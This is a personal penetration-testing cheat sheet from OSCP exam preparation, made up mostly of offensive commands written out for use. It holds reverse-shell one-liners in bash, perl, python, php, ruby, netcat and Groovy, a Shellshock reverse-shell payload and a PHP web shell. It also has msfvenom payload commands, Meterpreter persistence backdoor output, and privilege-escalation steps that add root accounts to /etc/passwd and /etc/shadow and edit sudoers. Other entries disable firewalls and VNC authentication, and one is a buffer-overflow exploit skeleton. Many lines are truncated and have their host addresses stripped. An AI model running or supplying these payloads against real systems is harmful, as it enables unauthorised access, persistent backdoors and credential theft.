Notes essentially from OSCP days


Discover service versions of open ports using nmap or manually. nmap: Use -p- for all ports Also make sure to run a udp scan with: nmap -sU -sV

Go for low hanging fruits by looking up exploits for service versions.

Http site

If you find an MD5 or some other hash - try to crack it quickly

When source or directry listing is available check for credentials for things like DB.


netdiscover -r

OS xprobe2

nmap -sS -A -O -n -p1-65535

SMB (139,445):

nbtscan -r
smbclient -L -U anonymous
smbclient // -U anonymous 
enum4linux -a


nmap -p 139,445 --script=vuln

rpcclient -U ""

SNMP (UDP 161)

onesixtyone -c community 
snmpwalk -c public -v1 

SMTP nc to 25 port and then run VRFY bob

DNS Zone Transfer

Figure out dns server: host -t ns host -t mx now attempt zone transfer for all the dns servers: host -l

complete enumeration dnsenum following will attempt zone transfer dnsrecon -d -t axfr

Vulnerability Scanning nmap --script all <IP>


rcpinfo -p <IP>
showmount <IP> -a
mount ./testing


cewl -m 6 -w mega-cewl.txt


john --wordlist=mega-cewl.txt --rules --stdout > mega-mangled

Locate db path:


hydra -l garry -F -P /usr/share/wordlists/rockyou.txt -s 8080 http-post-form "/php/index.php:tg=login&referer=index.php&login=login&sAuthType=Ovidentia&nickname=^USER^&password=^PASS^&submit=Login:F=Failed:H=Cookie\: OV3176019645=a4u215fgf3tj8718i0b1rj7ia5"

-F stop after getting login

http-post-form “<url>:<post data>:F=<fail text:H=<header>”

hydra -l root -P /root/rockyou.txt ssh



sqlmap -u --method POST --data "username=1&password=pass" -p "username,password" --cookie="PHPSESSID=crp8r4pq35vv0fm1l5td32q922" --dbms=MySQL --text-only --level=5 --risk=2

sqlmap -u "" --cookie="PHPSESSID=1im32c1q8b54vr27eussjjp6n2" -p pagename --level=5 --risk=3 -a

msfvenom -p linux/x86/shell/reverse_tcp LHOST= LPORT=1234 -f elf > reverse.elf
msfvenom -p cmd/unix/reverse_bash  LHOST= LPORT=1234 -f raw >
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"



cut -c2- cut the first 2 characters rev: cat foo|rev reverse contents of cat


Rev shell

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('', 6660))
s.send("GET /" + buffer + " HTTP/1.1" + "\r\n\r\n")

Python eval() and 2.7 read() exploit:

__import__("os").system("netstat -antp|nc 1234")

Deserialization (Pickle) exploit template

def create_command(cmd, args, flags):
    template = """csubprocess
    return template.format(cmd, args, flags)

hack = create_command('ls', '..', '-la')

Port knocking

for x in 27017 28017; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x; done

Python script to read from port template

#!/usr/bin/env python
import socket

IP = ''
PORT = 631
MSG = open('a').read()

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
data = s.recv(1024)
print data1
data2 = s.recv(1024)
print data2


Covert LFI to see php code:


wpscan --url --enumerate u to enumerate and bruteforce users based on wordlist use: wpscan -u --wordlist /usr/share/wordlists/rockyou.txt --threads 50

Samaba Share

smbclient -L host
smbclient \\\\zimmerman\\public mypasswd
smbclient //billy/EricsSecretStuff -u anonymous

enum4linux -a will do all sort of enumerations on samba

From Crunch to generate wordlist based on options

crunch 10 10 -t %%%qwerty^ > craven.txt This creates wordlist with min 10 letters and max 10 letters starting with 3 numbers, then string ‘qwerty’ then special characters.

Chrome browser user agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 Google bot: User-Agent: Googlebot/2.1 (+

Find file type based on pattern when ‘file’ command does not work:

find /proc -regex '\/proc\/[0-9]+\/fd\/.*' -type l -lname "*network*" -printf "%p -> %l\n" 2> /dev/null

MySql supports # for commenting on top of –

Find text recursively in files in this folder

grep -rnwl '/path/to/somewhere/' -e "pattern"

wpscan to scan wordpress site for vulns

wpscan --url --enumerate uap

ShellShock over http when you get response from cgi-bin which have server info only

wget -qO- -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);[\"/bin/sh\",\"-i\"]);' 2>&1"


user fcrackzip to brute force zip


mangle with john?

sort cewl | uniq >>cewl2

Check cert:

openssl s_client -connect

Password Cracking

Wordpress password crack - - see .251

cat /usr/share/wordlists/rockyou.txt | python /root/labs/251/phpass_crack-master/ pass.txt -v

it seems john does a better job at php password cracking when using a wordlist john --wordlist=/root/rockyou.txt pass.txt




echo -n 666c6167307b7468655f717569657465 |xxd -r -p

Convert windows file to linux

cat file | dos2unix > file2

base64 -d

PUT to webserver: Use poster Ctrl+Alt+P in Firefox and set url containg file path and chose file and PUT.

zip all files in this folder zip -r .

Covert py to .exe - pyinstaller: "C:\Program Files\Python27\python.exe" "C:\Program Files\Python27\Scripts\"

Rev Shell



Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):

bash -i >& /dev/tcp/ 0>&1


Here’s a shorter, feature-free version of the perl-reverse-shell:

perl -e 'use Socket;$i="";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'


This was tested under Linux / Python 2.7:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'


"import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('',1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);['C:\\WINDOWS\\system32\\cmd.exe','-i']);"


This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6…

php -r '$sock=fsockopen("",443);exec("/bin/sh -i <&3 >&3 2>&3");'

If you want a .php file to upload, see the more featureful and robust php-reverse-shell.


ruby -rsocket -e'"",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'


Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option. nc -e /bin/sh 1234 If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f


r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])

[Untested submission from anonymous reader]


One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you ( on TCP port 6001.

xterm -display

To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system): Xnest :1 You’ll need to authorise the target to connect to you (command also run on your host): xhost +targetip

PHP web shell

<pre><?php echo shell_exec($_GET['c']);?><pre/> In base 64 PHByZT48P3BocCBlY2hvIHNoZWxsX2V4ZWMoJF9HRVRbJ2MnXSk7Pz48cHJlLz4K

cmd.exe >& /dev/tcp/ 0>&1



set exploit/name #select exploit
set PAYLOAD payload/name # select payload
show options #  show options for selected payloads
exploit # to start exploit
show sessions
session -i 2 #interact with session number 2
# Ctrl+Z - send session to background


sysinfo #display info

getsystem #windows only


meterpereter> use mimikatz

help mimikatz


msfvenom -p linux/x86/shell/reverse_tcp LHOST= LPORT=1234 –e x86/shikata_ga_nai -b "\x00\x0a\x0d" -f js_le>shell
msfvenom -p windows/shell_bind_tcp  -f exe >labs/31/shell.exe
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=4444 –e x86/shikata_ga_nai -b "\x00\x0a\x0d" -f js_le > shell2
msfvenom -p windows/shell_reverse__tcp  -f asp LHOST= LPORT=443 -o labs/229/shell.asp
root@kali:~/labs/237/davfs# msfvenom --help-platforms
        aix, android, bsd, bsdi, cisco, firefox, freebsd, hpux, irix, java, javascript, linux, mainframe, netbsd, netware, nodejs, openbsd, osx, php, python, ruby, solaris, unix, windows

root@kali:~/labs/237/davfs# msfvenom --help-formats
Executable formats
        asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
Transform formats
        bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

Meterpreter Handler:

msf> use multi/handler
msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp
set payload linux/x86/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST <Listening_IP> (for example set LHOST
msf exploit(handler) > set LPORT <Listening_Port> (for example set LPORT 4444)
msf exploit(handler) > exploit -z
Executable formats (-f)
	asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
Transform formats 
	bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

Platforms (--platform)
        aix, android, bsd, bsdi, cisco, firefox, freebsd, hpux, irix, java, javascript, linux, mainframe, netbsd, netware, nodejs, openbsd, osx, php, python, ruby, solaris, unix, windows

Reverse Shells:
set payload linux/armbe/shell_bind_tcp                set payload linux/ppc64/shell_reverse_tcp             set payload linux/x86/mettle/bind_ipv6_tcp_uuid
set payload linux/armle/exec                          set payload linux/x64/exec                            set payload linux/x86/mettle/bind_nonx_tcp
set payload linux/armle/mettle/bind_tcp               set payload linux/x64/mettle/bind_tcp                 set payload linux/x86/mettle/bind_tcp
set payload linux/armle/mettle/reverse_tcp            set payload linux/x64/mettle/reverse_tcp              set payload linux/x86/mettle/bind_tcp_uuid
set payload linux/armle/shell/bind_tcp                set payload linux/x64/shell/bind_tcp                  set payload linux/x86/mettle/reverse_ipv6_tcp
set payload linux/armle/shell/reverse_tcp             set payload linux/x64/shell/reverse_tcp               set payload linux/x86/mettle/reverse_nonx_tcp
set payload linux/armle/shell_bind_tcp                set payload linux/x64/shell_bind_tcp                  set payload linux/x86/mettle/reverse_tcp
set payload linux/armle/shell_reverse_tcp             set payload linux/x64/shell_bind_tcp_random_port      set payload linux/x86/mettle/reverse_tcp_uuid
set payload linux/mipsbe/exec                         set payload linux/x64/shell_reverse_tcp               set payload linux/x86/read_file
set payload linux/mipsbe/mettle/reverse_tcp           set payload linux/x86/chmod                           set payload linux/x86/shell/bind_ipv6_tcp
set payload linux/mipsbe/reboot                       set payload linux/x86/exec                            set payload linux/x86/shell/bind_ipv6_tcp_uuid
set payload linux/mipsbe/shell/reverse_tcp            set payload linux/x86/meterpreter/bind_ipv6_tcp       set payload linux/x86/shell/bind_nonx_tcp
set payload linux/mipsbe/shell_bind_tcp               set payload linux/x86/meterpreter/bind_ipv6_tcp_uuid  set payload linux/x86/shell/bind_tcp
set payload linux/mipsbe/shell_reverse_tcp            set payload linux/x86/meterpreter/bind_nonx_tcp       set payload linux/x86/shell/bind_tcp_uuid
set payload linux/mipsle/exec                         set payload linux/x86/meterpreter/bind_tcp            set payload linux/x86/shell/reverse_ipv6_tcp
set payload linux/mipsle/mettle/reverse_tcp           set payload linux/x86/meterpreter/bind_tcp_uuid       set payload linux/x86/shell/reverse_nonx_tcp
set payload linux/mipsle/reboot                       set payload linux/x86/meterpreter/reverse_ipv6_tcp    set payload linux/x86/shell/reverse_tcp
set payload linux/mipsle/shell/reverse_tcp            set payload linux/x86/meterpreter/reverse_nonx_tcp    set payload linux/x86/shell/reverse_tcp_uuid
set payload linux/mipsle/shell_bind_tcp               set payload linux/x86/meterpreter/reverse_tcp         set payload linux/x86/shell_bind_ipv6_tcp
set payload linux/mipsle/shell_reverse_tcp            set payload linux/x86/meterpreter/reverse_tcp_uuid    set payload linux/x86/shell_bind_tcp
set payload linux/ppc/shell_bind_tcp                  set payload linux/x86/metsvc_bind_tcp                 set payload linux/x86/shell_bind_tcp_random_port
set payload linux/ppc/shell_reverse_tcp               set payload linux/x86/metsvc_reverse_tcp              set payload linux/x86/shell_reverse_tcp
set payload linux/ppc64/shell_bind_tcp                set payload linux/x86/mettle/bind_ipv6_tcp            

set payload windows/dllinject/bind_hidden_ipknock_tcp           set payload windows/patchupdllinject/bind_tcp_uuid              set payload windows/upexec/reverse_tcp_dns
set payload windows/dllinject/bind_hidden_tcp                   set payload windows/patchupdllinject/reverse_ipv6_tcp           set payload windows/upexec/reverse_tcp_rc4
set payload windows/dllinject/bind_ipv6_tcp                     set payload windows/patchupdllinject/reverse_nonx_tcp           set payload windows/upexec/reverse_tcp_rc4_dns
set payload windows/dllinject/bind_ipv6_tcp_uuid                set payload windows/patchupdllinject/reverse_ord_tcp            set payload windows/upexec/reverse_tcp_uuid
set payload windows/dllinject/bind_nonx_tcp                     set payload windows/patchupdllinject/reverse_tcp                set payload windows/vncinject/bind_hidden_ipknock_tcp
set payload windows/dllinject/bind_tcp                          set payload windows/patchupdllinject/reverse_tcp_allports       set payload windows/vncinject/bind_hidden_tcp
set payload windows/dllinject/bind_tcp_rc4                      set payload windows/patchupdllinject/reverse_tcp_dns            set payload windows/vncinject/bind_ipv6_tcp
set payload windows/dllinject/bind_tcp_uuid                     set payload windows/patchupdllinject/reverse_tcp_rc4            set payload windows/vncinject/bind_ipv6_tcp_uuid
set payload windows/dllinject/reverse_hop_http                  set payload windows/patchupdllinject/reverse_tcp_rc4_dns        set payload windows/vncinject/bind_nonx_tcp
set payload windows/dllinject/reverse_http                      set payload windows/patchupdllinject/reverse_tcp_uuid           set payload windows/vncinject/bind_tcp
set payload windows/dllinject/reverse_http_proxy_pstore         set payload windows/patchupmeterpreter/bind_hidden_ipknock_tcp  set payload windows/vncinject/bind_tcp_rc4
set payload windows/dllinject/reverse_ipv6_tcp                  set payload windows/patchupmeterpreter/bind_hidden_tcp          set payload windows/vncinject/bind_tcp_uuid
set payload windows/dllinject/reverse_nonx_tcp                  set payload windows/patchupmeterpreter/bind_ipv6_tcp            set payload windows/vncinject/reverse_hop_http
set payload windows/dllinject/reverse_ord_tcp                   set payload windows/patchupmeterpreter/bind_ipv6_tcp_uuid       set payload windows/vncinject/reverse_http
set payload windows/dllinject/reverse_tcp                       set payload windows/patchupmeterpreter/bind_nonx_tcp            set payload windows/vncinject/reverse_http_proxy_pstore
set payload windows/dllinject/reverse_tcp_allports              set payload windows/patchupmeterpreter/bind_tcp                 set payload windows/vncinject/reverse_ipv6_tcp
set payload windows/dllinject/reverse_tcp_dns                   set payload windows/patchupmeterpreter/bind_tcp_rc4             set payload windows/vncinject/reverse_nonx_tcp
set payload windows/dllinject/reverse_tcp_rc4                   set payload windows/patchupmeterpreter/bind_tcp_uuid            set payload windows/vncinject/reverse_ord_tcp
set payload windows/dllinject/reverse_tcp_rc4_dns               set payload windows/patchupmeterpreter/reverse_ipv6_tcp         set payload windows/vncinject/reverse_tcp
set payload windows/dllinject/reverse_tcp_uuid                  set payload windows/patchupmeterpreter/reverse_nonx_tcp         set payload windows/vncinject/reverse_tcp_allports
set payload windows/dllinject/reverse_winhttp                   set payload windows/patchupmeterpreter/reverse_ord_tcp          set payload windows/vncinject/reverse_tcp_dns
set payload windows/dns_txt_query_exec                          set payload windows/patchupmeterpreter/reverse_tcp              set payload windows/vncinject/reverse_tcp_rc4
set payload windows/download_exec                               set payload windows/patchupmeterpreter/reverse_tcp_allports     set payload windows/vncinject/reverse_tcp_rc4_dns
set payload windows/exec                                        set payload windows/patchupmeterpreter/reverse_tcp_dns          set payload windows/vncinject/reverse_tcp_uuid
set payload windows/loadlibrary                                 set payload windows/patchupmeterpreter/reverse_tcp_rc4          set payload windows/vncinject/reverse_winhttp
set payload windows/messagebox                                  set payload windows/patchupmeterpreter/reverse_tcp_rc4_dns      set payload windows/x64/exec
set payload windows/meterpreter/bind_hidden_ipknock_tcp         set payload windows/patchupmeterpreter/reverse_tcp_uuid         set payload windows/x64/loadlibrary
set payload windows/meterpreter/bind_hidden_tcp                 set payload windows/powershell_bind_tcp                         set payload windows/x64/meterpreter/bind_ipv6_tcp
set payload windows/meterpreter/bind_ipv6_tcp                   set payload windows/powershell_reverse_tcp                      set payload windows/x64/meterpreter/bind_ipv6_tcp_uuid
set payload windows/meterpreter/bind_ipv6_tcp_uuid              set payload windows/shell/bind_hidden_ipknock_tcp               set payload windows/x64/meterpreter/bind_tcp
set payload windows/meterpreter/bind_nonx_tcp                   set payload windows/shell/bind_hidden_tcp                       set payload windows/x64/meterpreter/bind_tcp_uuid
set payload windows/meterpreter/bind_tcp                        set payload windows/shell/bind_ipv6_tcp                         set payload windows/x64/meterpreter/reverse_http
set payload windows/meterpreter/bind_tcp_rc4                    set payload windows/shell/bind_ipv6_tcp_uuid                    set payload windows/x64/meterpreter/reverse_https
set payload windows/meterpreter/bind_tcp_uuid                   set payload windows/shell/bind_nonx_tcp                         set payload windows/x64/meterpreter/reverse_tcp
set payload windows/meterpreter/reverse_hop_http                set payload windows/shell/bind_tcp                              set payload windows/x64/meterpreter/reverse_tcp_uuid
set payload windows/meterpreter/reverse_http                    set payload windows/shell/bind_tcp_rc4                          set payload windows/x64/meterpreter/reverse_winhttp
set payload windows/meterpreter/reverse_http_proxy_pstore       set payload windows/shell/bind_tcp_uuid                         set payload windows/x64/meterpreter/reverse_winhttps
set payload windows/meterpreter/reverse_https                   set payload windows/shell/reverse_ipv6_tcp                      set payload windows/x64/meterpreter_bind_tcp
set payload windows/meterpreter/reverse_https_proxy             set payload windows/shell/reverse_nonx_tcp                      set payload windows/x64/meterpreter_reverse_http
set payload windows/meterpreter/reverse_ipv6_tcp                set payload windows/shell/reverse_ord_tcp                       set payload windows/x64/meterpreter_reverse_https
set payload windows/meterpreter/reverse_nonx_tcp                set payload windows/shell/reverse_tcp                           set payload windows/x64/meterpreter_reverse_ipv6_tcp
set payload windows/meterpreter/reverse_ord_tcp                 set payload windows/shell/reverse_tcp_allports                  set payload windows/x64/meterpreter_reverse_tcp
set payload windows/meterpreter/reverse_tcp                     set payload windows/shell/reverse_tcp_dns                       set payload windows/x64/powershell_bind_tcp
set payload windows/meterpreter/reverse_tcp_allports            set payload windows/shell/reverse_tcp_rc4                       set payload windows/x64/powershell_reverse_tcp
set payload windows/meterpreter/reverse_tcp_dns                 set payload windows/shell/reverse_tcp_rc4_dns                   set payload windows/x64/shell/bind_ipv6_tcp
set payload windows/meterpreter/reverse_tcp_rc4                 set payload windows/shell/reverse_tcp_uuid                      set payload windows/x64/shell/bind_ipv6_tcp_uuid
set payload windows/meterpreter/reverse_tcp_rc4_dns             set payload windows/shell_bind_tcp                              set payload windows/x64/shell/bind_tcp
set payload windows/meterpreter/reverse_tcp_uuid                set payload windows/shell_bind_tcp_xpfw                         set payload windows/x64/shell/bind_tcp_uuid
set payload windows/meterpreter/reverse_winhttp                 set payload windows/shell_hidden_bind_tcp                       set payload windows/x64/shell/reverse_tcp
set payload windows/meterpreter/reverse_winhttps                set payload windows/shell_reverse_tcp                           set payload windows/x64/shell/reverse_tcp_uuid
set payload windows/meterpreter_bind_tcp                        set payload windows/speak_pwned                                 set payload windows/x64/shell_bind_tcp
set payload windows/meterpreter_reverse_http                    set payload windows/upexec/bind_hidden_ipknock_tcp              set payload windows/x64/shell_reverse_tcp
set payload windows/meterpreter_reverse_https                   set payload windows/upexec/bind_hidden_tcp                      set payload windows/x64/vncinject/bind_ipv6_tcp
set payload windows/meterpreter_reverse_ipv6_tcp                set payload windows/upexec/bind_ipv6_tcp                        set payload windows/x64/vncinject/bind_ipv6_tcp_uuid
set payload windows/meterpreter_reverse_tcp                     set payload windows/upexec/bind_ipv6_tcp_uuid                   set payload windows/x64/vncinject/bind_tcp
set payload windows/metsvc_bind_tcp                             set payload windows/upexec/bind_nonx_tcp                        set payload windows/x64/vncinject/bind_tcp_uuid
set payload windows/metsvc_reverse_tcp                          set payload windows/upexec/bind_tcp                             set payload windows/x64/vncinject/reverse_http
set payload windows/patchupdllinject/bind_hidden_ipknock_tcp    set payload windows/upexec/bind_tcp_rc4                         set payload windows/x64/vncinject/reverse_https
set payload windows/patchupdllinject/bind_hidden_tcp            set payload windows/upexec/bind_tcp_uuid                        set payload windows/x64/vncinject/reverse_tcp
set payload windows/patchupdllinject/bind_ipv6_tcp              set payload windows/upexec/reverse_ipv6_tcp                     set payload windows/x64/vncinject/reverse_tcp_uuid
set payload windows/patchupdllinject/bind_ipv6_tcp_uuid         set payload windows/upexec/reverse_nonx_tcp                     set payload windows/x64/vncinject/reverse_winhttp
set payload windows/patchupdllinject/bind_nonx_tcp              set payload windows/upexec/reverse_ord_tcp                      set payload windows/x64/vncinject/reverse_winhttps
set payload windows/patchupdllinject/bind_tcp                   set payload windows/upexec/reverse_tcp
set payload windows/patchupdllinject/bind_tcp_rc4               set payload windows/upexec/reverse_tcp_allports

set payload bsd/sparc/shell_bind_tcp         set payload bsd/x64/shell_bind_tcp           set payload bsd/x64/shell_reverse_tcp_small  set payload bsd/x86/shell/bind_ipv6_tcp      set payload bsd/x86/shell_bind_tcp
set payload bsd/sparc/shell_reverse_tcp      set payload bsd/x64/shell_bind_tcp_small     set payload bsd/x86/exec                     set payload bsd/x86/shell/bind_tcp           set payload bsd/x86/shell_bind_tcp_ipv6
set payload bsd/x64/exec                     set payload bsd/x64/shell_reverse_ipv6_tcp   set payload bsd/x86/metsvc_bind_tcp          set payload bsd/x86/shell/reverse_ipv6_tcp   set payload bsd/x86/shell_reverse_tcp
set payload bsd/x64/shell_bind_ipv6_tcp      set payload bsd/x64/shell_reverse_tcp        set payload bsd/x86/metsvc_reverse_tcp       set payload bsd/x86/shell/reverse_tcp        set payload bsd/x86/shell_reverse_tcp_ipv6


meterpreter > run persistence -h

Meterpreter Script for creating a persistent backdoor on a target host.


    -A        Automatically start a matching exploit/multi/handler to connect to the agent
    -L <opt>  Location in target host to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on which the system running Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back

meterpreter > run persistence -A -L C:\\ -X -U -i 10 -r -p 4910
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DJ_20170216.2235/DJ_20170216.2235.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST= LPORT=4910
[*] Persistent agent script is 99650 bytes long
[+] Persistent Script written to C:\\pGjIiHMHVx.vbs
[*] Starting connection handler at port 4910 for windows/meterpreter/reverse_tcp
[+] exploit/multi/handler started!
[*] Executing script C:\\pGjIiHMHVx.vbs
[+] Agent executed with PID 1504
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jsrbPyVQMnmU
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jsrbPyVQMnmU


net users
net user <bob>

Run powershell command: powershell -ExecutionPolicy Bypass -NoLogo -NoProfile -Command "dir"

Run local smb server to copy files to windows hosts easily:

  1. copy files to /root/smb/
  2. service smb start
  3. copy \\file.exe . # on windows target

Add user

run getgui -u myadmin -p Pass1234
net user myadmin Pass1234 /add
net localgroup Administrators myadmin /add
rdesktop -u myadmin -p Pass1234 -g 80%

Run as: psexec -u alice -p alicei123 C:\HFS\shellm80c.exe

SAM: So the three locations of the SAM\Hashes are:

nmap -sV --script=rdp-vuln-ms12-020 -p 3389 <target>

meterpreter > run post/multi/recon/local_exploit_suggester

Firewall XP netsh firewall set opmode mode=DISABLE New: netsh advfirewall set allprofiles state off


run getgui -u myuser -p mypass 
rdesktop -u myuser -p mypass -g 90%

Lookup windows version from product version in C:\Windows\explorer.exe:

PE (switch admin user to NT Authority/System): psexec.exe -s cmd

post/windows/gather/credentials/gpp Meterpreter Search GPP

Windows Exploit Suggester

Compile i686-w64-mingw32-gcc 646.c -lws2_32 -o 646.exe


atftpd --daemon --port 69 `pwd` 
c=tftp -i get shellM.exe

VNC - RealVNC4

meterpreter > reg setval -k HKEY_LOCAL_MACHINE\\SOFTWARE\\RealVNC\\WinVNC4 -v SecurityTypes -d None
Successfully set SecurityTypes of REG_SZ.

(Also try HKCU\Software\RealVNC\WinVNC4\SecurityTypes if above does not work)


service smbd start /root/smb is shared

Mount Using: net use z: \\\oscp\

nbtscan -r
enum4linux -a
root@kali:~# nmblookup -A
smbclient -L \\host -I -N
smbclient  //host/Bob\ Share -I -N


sqsh -S10.11.1.31 -Usa -Ppoiuytrewq -Dbankdb`
vi  ~/.sqshrc
\set username=sa
\set password=password
\set style=vert
root@kali:~/# sqsh -S s128
sqsh-2.1.7 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2010 Michael Peppler
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
1> xp_cmdshell 'whoami'
2> go
output: NULL
(return status = 0)
1> xp_cmdshell 'type "C:\Documents and Settings\Administrator\Desktop\proof.txt"'
2> go
output: contents of proof.txt
output: NULL
(return status = 0)



Once in, look for clues in current dir and user home dir

If you find both passwd and shadow you can use unshadow to combine them and then run john: Unshadow passwd shadow>combined

Always run ps aux: ps -f ax for parent id ps afx for graphical parent id

Shell shock

env x='() { :;}; echo vulnerable' bash -c "ps aux"
env x='() { :;}; /usr/bin/id' /bin/bash -c "/usr/bin/id"
/usr/bin/env x='() { :;}; /usr/bin/id' /bin/bash -c "ps aux"

check sudo -l for a list of commands that the current user can run as other users without entering any password.

if python is found find / -name "python*" 2>/dev/null it can be used to get TTY with: python -c 'import pty; pty.spawn("/bin/bash")'

Find writable files for user: find / -writable -type f 2>/dev/null | grep -v ^/proc

Any suspected file run periodically (via crontab) which can be edited might allow to PE.

look through logs to find interesting processes/configurations

Find files which have stickey bit on /bin/find / -perm -4001 -type f 2>/dev/null

uid and gid with root find / -perm +2000 -user root -type f 2>/dev/null find / -perm +4000 -user root -type f 2>/dev/null

Run command using stickybit in executable to get shell

/etc/passwd is writable:

echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
su - dummy

add user in both passwd and shadow toor:toor:

echo 'toor:x:0:0:root:/root:/bin/bash' >>/etc/passwd
echo 'toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::' >>/etc/shadow

msf exploit(handler) > run post/multi/recon/local_exploit_suggester

if we have euid set to 1001 python -c 'import os,pty; os.setresuid(1001,1001,1001); pty.spawn("/bin/bash")'

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
	setuid(0); setgid(0); system("/bin/bash"); //setregit(0,0); setegit(0); in case we have only euid set to 0. To check run ./<esc file> id

Maintaing PE echo "userName ALL=(ALL:ALL) ALL">>/etc/sudoers then use sudo su from user userName



Immnunity debugger

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438

root@kali:~/labs/614# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > JMP ESP
00000000  FFE4              jmp esp
nasm > add eax,12
00000000  83C00C            add eax,byte +0xc

!mona modules
!mona find -s "\xff\xe4" -m SLMFC.DLL

write return address in the script return for x86 (LE)

Python script

import socket
#string = "A"*2700
string = "A"*2606
string += "\xE3\x41\x4B\x5F"
buf =  "\x90"*20		# NOPs to allow decoding
string += buf
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.send('USER test\r\n')
	s.send('PASS ' + string + '\r\n')
	print('Unable to connect')


edb --run /usr/games/crossfire/bin/crossfire

Strings <filename>
Ollydbg for windows
F2 - place breakpoint
F7 - jump into
F8 - allow completion

objdump -d file will dump assembly


Get path of container in host file structure:

docker_path=/proc/$(docker inspect --format <ContainerID>)/root

transfer docker image to host by using root@kali:~/# docker save uzyexe/nmap -o nmap.tar and after copying on target:

docker load -input nmap.tar
docker run --network=br0 -it --rm uzyexe/nmap -sn -T4 -v >scan.out &

Identify if you are inside a container - cat /proc/self/cgroup | grep docker